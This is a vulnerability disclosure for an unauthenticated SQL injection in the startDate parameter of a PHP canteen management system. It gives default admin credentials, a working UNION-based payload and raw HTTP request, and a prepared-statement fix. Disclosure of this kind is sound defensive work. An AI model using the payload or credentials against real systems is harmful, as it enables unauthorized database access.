# SQL injection in Canteen Management System v1.0

## Bug author: Tuannq (https://github.com/tuannq2299)

Discovered Day: 5/1/2023

Vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

Login account: `mayuri.infospace@gmail.com/rootadmin` (Super Admin account)

Vulnerability File: /php_action/getOrderReport.php

Vulnerability location: /php_action/getOrderReport.php, `startDate`

**CVSS 3.0**: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Payload:

`startDate=2023-01-05'+UNION+ALL+SELECT+4406,CONCAT(0x716a627a71,IFNULL(CAST(table_name+AS+NCHAR),0x20),0x716a6a7071),4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema+IN+(0x796f757468617070616d)--+-`

```
POST /youthappam/php_action/getOrderReport.php HTTP/1.1
Host: localhost
Content-Length: 297
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="104"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://localhost/youthappam/report.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

startDate=2023-01-05'+UNION+ALL+SELECT+4406,CONCAT(0x716a627a71,IFNULL(CAST(table_name+AS+NCHAR),0x20),0x716a6a7071),4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406,4406+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema+IN+(0x796f757468617070616d)--+-&endDate=2023-01-06
```

The request can be sent by an unauthenticated user; for that reason, the CVSS of this vulnerability is **9.8**.

## PoC

![](https://i.imgur.com/sXcZPbI.png)

## Source Code Analysis

The value of the `startDate` parameter is passed into the SQL query and executed without any sanitization.

![](https://i.imgur.com/juWQqAL.png)
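As an added illustration (not the project's own code, which only appears in the screenshot above), the following reconstructs the unsanitized date-range pattern described here next to a prepared-statement fix; the table name `orders`, the column `order_date` and the database credentials are assumptions.

```php
<?php
// Added example: reconstructs the pattern described in the advisory.
// Table/column names and the connection details are assumed, not taken from the project.
$db = new mysqli('localhost', 'dbuser', 'dbpass', 'youthappam');

// VULNERABLE: the request parameter is concatenated straight into the SQL text,
// so a single quote in startDate closes the string literal and everything after
// it (the advisory's UNION ALL SELECT ...) is executed as SQL.
function getOrderReportVulnerable(mysqli $db, string $startDate, string $endDate): array
{
    $sql = "SELECT * FROM orders WHERE order_date BETWEEN '$startDate' AND '$endDate'";
    return $db->query($sql)->fetch_all(MYSQLI_ASSOC);
}

// FIXED: reject anything that is not a real YYYY-MM-DD date, then bind the
// values as parameters so the driver transmits them as data, never as SQL.
function getOrderReportFixed(mysqli $db, string $startDate, string $endDate): array
{
    foreach ([$startDate, $endDate] as $d) {
        // The round-trip check also rejects impossible dates such as 2023-02-30.
        $parsed = DateTime::createFromFormat('!Y-m-d', $d);
        if ($parsed === false || $parsed->format('Y-m-d') !== $d) {
            throw new InvalidArgumentException('invalid date');
        }
    }
    $stmt = $db->prepare('SELECT * FROM orders WHERE order_date BETWEEN ? AND ?');
    $stmt->bind_param('ss', $startDate, $endDate);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// The advisory's payload fails the date check and never reaches the database;
// even if validation were skipped, bind_param would keep it as a plain string.
try {
    $rows = getOrderReportFixed($db, $_POST['startDate'] ?? '', $_POST['endDate'] ?? '');
    echo json_encode($rows);
} catch (InvalidArgumentException $e) {
    http_response_code(400);
    echo 'Bad request';
}
```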